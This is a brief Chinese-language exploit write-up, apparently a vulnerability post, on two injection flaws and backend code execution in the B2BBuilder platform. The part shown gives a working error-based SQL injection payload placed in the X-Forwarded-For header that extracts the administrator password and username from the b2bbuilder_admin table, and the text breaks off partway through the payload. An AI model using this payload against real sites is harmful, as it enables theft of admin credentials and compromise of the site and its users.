B2BBuilder 两处注入+后台任意代码执行利用

1、B2BBuilder头注入后台任意代码执行构造头部测试x-forwarded-for:' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,password,user,0x27,0x7e) from b2bbuilder_admin limit 0,1)) from information_schema.tables limit 0,1)...